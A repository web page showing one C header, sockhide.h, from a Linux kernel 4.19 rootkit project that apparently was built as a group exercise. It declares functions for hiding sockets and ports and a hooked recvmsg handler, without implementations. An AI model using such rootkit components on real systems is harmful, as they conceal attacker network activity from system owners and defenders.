linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

sockhide.h (862B)

      1 #ifndef _GROUP7_SOCKHIDE_H
      2 #define _GROUP7_SOCKHIDE_H
      3 
      4 typedef enum {
      5     tcp4,
      6     udp4,
      7     tcp6,
      8     udp6
      9 } proto_t;
     10 
     11 typedef unsigned short port_t;
     12 
     13 typedef struct port_list *port_list_t_ptr;
     14 typedef struct port_list {
     15     port_t port;
     16     proto_t proto;
     17     port_list_t_ptr prev;
     18     port_list_t_ptr next;
     19 } port_list_t;
     20 
     21 extern port_list_t hidden_ports;
     22 
     23 void hide_sockets(void);
     24 void unhide_sockets(void);
     25 
     26 void hide_port(port_t, proto_t);
     27 void unhide_port(port_t, proto_t);
     28 
     29 asmlinkage ssize_t g7_recvmsg(struct pt_regs *);
     30 
     31 void clear_hidden_ports(void);
     32 bool list_contains_port(port_list_t_ptr, port_t, proto_t);
     33 port_list_t_ptr find_port_in_list(port_list_t_ptr, port_t, proto_t);
     34 port_list_t_ptr add_port_to_list(port_list_t_ptr, port_t, proto_t);
     35 port_list_t_ptr remove_port_from_list(port_list_t_ptr, port_t, proto_t);
     36 
     37 #endif //_GROUP7_SOCKHIDE_H